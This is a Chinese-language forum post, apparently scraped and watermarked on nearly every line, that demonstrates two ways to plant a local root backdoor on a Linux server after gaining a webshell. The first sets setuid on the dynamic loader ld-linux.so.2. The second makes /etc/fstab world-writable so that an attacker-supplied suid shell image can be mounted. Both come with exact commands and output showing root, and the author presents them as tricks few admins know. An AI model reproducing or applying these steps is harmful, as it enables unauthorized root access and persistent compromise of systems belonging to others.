webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
#2ezX-BUG-关注前沿信息安全技术研究
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
$ whoami2ezX-BUG-关注前沿信息安全技术研究
xiaoyu2ezX-BUG-关注前沿信息安全技术研究
$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
root2ezX-BUG-关注前沿信息安全技术研究
$2ezX-BUG-关注前沿信息安全技术研究
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
方法二:2ezX-BUG-关注前沿信息安全技术研究
看过程:2ezX-BUG-关注前沿信息安全技术研究
# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
#2ezX-BUG-关注前沿信息安全技术研究
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
$ mount test2ezX-BUG-关注前沿信息安全技术研究
$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
$ ls -l2ezX-BUG-关注前沿信息安全技术研究
total 182ezX-BUG-关注前沿信息安全技术研究
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
$ ./root2ezX-BUG-关注前沿信息安全技术研究
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
2ezX-BUG-关注前沿信息安全技术研究
谢谢分享
页:
[1]